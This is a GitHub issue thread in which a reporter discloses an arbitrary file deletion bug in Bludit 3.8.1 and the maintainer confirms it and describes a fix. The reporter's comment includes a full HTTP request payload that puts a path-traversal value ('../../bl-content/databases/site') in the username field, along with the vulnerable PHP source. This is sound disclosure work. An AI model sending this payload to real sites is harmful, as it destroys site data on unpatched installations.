Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary File Delete - Security #978

Closed
jadacheng opened this issue Mar 5, 2019 · 3 comments
Closed

Arbitrary File Delete - Security #978

jadacheng opened this issue Mar 5, 2019 · 3 comments
Labels
Bug Bug in latest release version. Core Issues related to the Bludit core.

Comments

@jadacheng
Copy link

Hi There.
I found Bludit v3.8.1 allows remote attackers to delete arbitrary files via /admin/ajax/upload-profile-picture.

payload:

POST /bludit-3-8-1/admin/ajax/upload-profile-picture HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://127.0.0.1/bludit-3-8-1/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 494
Content-Type: multipart/form-data; boundary=---------------------------17313137228370
Cookie: vGmm_2132_ulastactivity=5a66isXeZdcONhOLRjRQVgmwjWfexLQ79o0nOIdENOlbV4a1I3eU; vGmm_2132_nofavfid=1; vGmm_2132_home_readfeed=1546482302; vGmm_2132_lastcheckfeed=2%7C1546563267; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1547020074; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1550382234; BLUDIT-KEY=5cqmavvdagu99n16379n6ukdh3
Connection: close

-----------------------------17313137228370
Content-Disposition: form-data; name="profilePictureInputFile"; filename="test.php"
Content-Type: application/octet-stream

cover
-----------------------------17313137228370
Content-Disposition: form-data; name="username"

../../bl-content/databases/site
-----------------------------17313137228370
Content-Disposition: form-data; name="tokenCSRF"

ac77e4f03d9cc78b4e615da278a2fb9d7ce01721
-----------------------------17313137228370--

then the file /bl-content/databases/site.php will be deleted.

@dignajar
Copy link
Member

dignajar commented Mar 7, 2019

Hi,
I'm trying to reproduce it but I can not.
Also in you example the filename="test.php" I don't see relation with /bl-content/databases/site.php

@jadacheng
Copy link
Author

Source /bl-kernel/ajax/upload-profile-picture.php:

<?php defined('BLUDIT') or die('Bludit CMS.');
header('Content-Type: application/json');
// $_POST
// ----------------------------------------------------------------------------
// (string) $_POST['username']
$username = empty($_POST['username']) ? false : $_POST['username'];
// ----------------------------------------------------------------------------
if ($username===false) {
	ajaxResponse(1, 'Error in username.');
}
if (!isset($_FILES['profilePictureInputFile'])) {
	ajaxResponse(1, 'Error trying to upload the profile picture.');
}
// File extension
$fileExtension 	= pathinfo($_FILES['profilePictureInputFile']['name'], PATHINFO_EXTENSION);
// Tmp filename
$tmpFilename = $username.'.'.$fileExtension;
// Final filename
$filename = $username.'.png';
// Move from temporary directory to uploads folder
rename($_FILES['profilePictureInputFile']['tmp_name'], PATH_TMP.$tmpFilename);
// Resize and convert to png
$image = new Image();
$image->setImage(PATH_TMP.$tmpFilename, PROFILE_IMG_WIDTH, PROFILE_IMG_HEIGHT, 'crop');
$image->saveImage(PATH_UPLOADS_PROFILES.$filename, PROFILE_IMG_QUALITY, false, true);
// Remove the tmp file
unlink(PATH_TMP.$tmpFilename);
// Permissions
chmod(PATH_UPLOADS_PROFILES.$filename, 0644);
ajaxResponse(0, 'Image uploaded.', array(
	'filename'=>$filename,
	'absoluteURL'=>DOMAIN_UPLOADS_PROFILES.$filename,
	'absolutePath'=>PATH_UPLOADS_PROFILES.$filename
));
?>

The deleted file path is $_POST['username'].'.'.pathinfo($_FILES['profilePictureInputFile']['name'], PATHINFO_EXTENSION);

payload:

  1. After the administrator logged in.Click in turn.
    image
    2.Grab a package
    image
    3.Modify the package
    image

@dignajar
Copy link
Member

Hi,
ok I got it.

I changed the code to check the image extension and check if the username has a directory separator.

2d535ad

Do you have a better solution in mind ?

@dignajar dignajar added Bug Bug in latest release version. Core Issues related to the Bludit core. labels Mar 10, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Bug Bug in latest release version. Core Issues related to the Bludit core.
Development

No branches or pull requests

2 participants